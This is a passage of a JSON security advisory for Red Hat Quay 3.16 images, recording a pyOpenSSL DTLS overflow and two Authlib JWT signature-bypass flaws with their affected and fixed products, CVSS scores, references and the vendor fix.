            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "pyOpenSSL: DTLS cookie callback buffer overflow"
    },
    {
      "cve": "CVE-2026-27962",
      "cwe": {
        "id": "CWE-347",
        "name": "Improper Verification of Cryptographic Signature"
      },
      "discovery_date": "2026-03-16T18:02:07.041902+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2448164"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Authlib, a Python library used for creating secure authentication and authorization systems. This vulnerability, known as JWK (JSON Web Key) Header Injection, affects how Authlib verifies digital signatures in JWS (JSON Web Signature) tokens. An attacker can exploit this by creating a specially crafted token that includes their own cryptographic key in the header. When the system attempts to verify this token without a predefined key, it mistakenly uses the attacker\u0027s key, allowing them to bypass authentication and gain unauthorized access.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "authlib: Authlib: Authentication bypass due to JWK Header Injection vulnerability",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "This critical vulnerability in Authlib\u0027s JWS implementation allows unauthenticated attackers to forge JWTs by embedding their own cryptographic key in the token header. Impact is high to confidentiality and integrity as attackers can bypass authentication.\n\nThe impact for Red Hat Quay is rated as low because it imports authlib solely as a JWK parsing utility and performs all JWT signature verification through PyJWT, so the vulnerable jws.deserialize_compact() code path is never called.\n\nRed Hat OpenShift AI is not affected, since authlib is only present as a transitive dependency in the dev dependency group and is not included in production image builds, so the vulnerable code is not present in the shipped product.\n\nRed Hat Satellite is not affected, as authlib is only present as a dependency of fastmcp. In Satellite, fastmcp only invokes authlib using jwt.decode() which isn\u0027t able to reach the vulnerability condition even with key=none.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-27962"
        },
        {
          "category": "external",
          "summary": "RHBZ#2448164",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448164"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-27962",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27962"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27962",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27962"
        },
        {
          "category": "external",
          "summary": "https://github.com/authlib/authlib/commit/a5d4b2d4c9e46bfa11c82f85fdc2bcc0b50ae681",
          "url": "https://github.com/authlib/authlib/commit/a5d4b2d4c9e46bfa11c82f85fdc2bcc0b50ae681"
        },
        {
          "category": "external",
          "summary": "https://github.com/authlib/authlib/releases/tag/v1.6.9",
          "url": "https://github.com/authlib/authlib/releases/tag/v1.6.9"
        },
        {
          "category": "external",
          "summary": "https://github.com/authlib/authlib/security/advisories/GHSA-wvwj-cvrp-7pv5",
          "url": "https://github.com/authlib/authlib/security/advisories/GHSA-wvwj-cvrp-7pv5"
        }
      ],
      "release_date": "2026-03-16T17:34:38.946000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Low"
        }
      ],
      "title": "authlib: Authlib: Authentication bypass due to JWK Header Injection vulnerability"
    },
    {
      "cve": "CVE-2026-28802",
      "cwe": {
        "id": "CWE-347",
        "name": "Improper Verification of Cryptographic Signature"
      },
      "discovery_date": "2026-03-06T07:01:49.366979+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2445120"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Authlib, a Python library for building OAuth and OpenID Connect servers. A remote attacker can exploit this vulnerability by crafting a malicious JSON Web Token (JWT) with a \"none\" algorithm and an empty signature. This bypasses the expected signature verification, potentially allowing the attacker to forge tokens and gain unauthorized access or perform unauthorized actions within applications using Authlib.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "authlib: Authlib: Signature verification bypass via malicious JWT allows unauthorized access",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-28802"
        },
        {
          "category": "external",
          "summary": "RHBZ#2445120",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445120"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-28802",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-28802"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-28802",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28802"
        },
        {
          "category": "external",
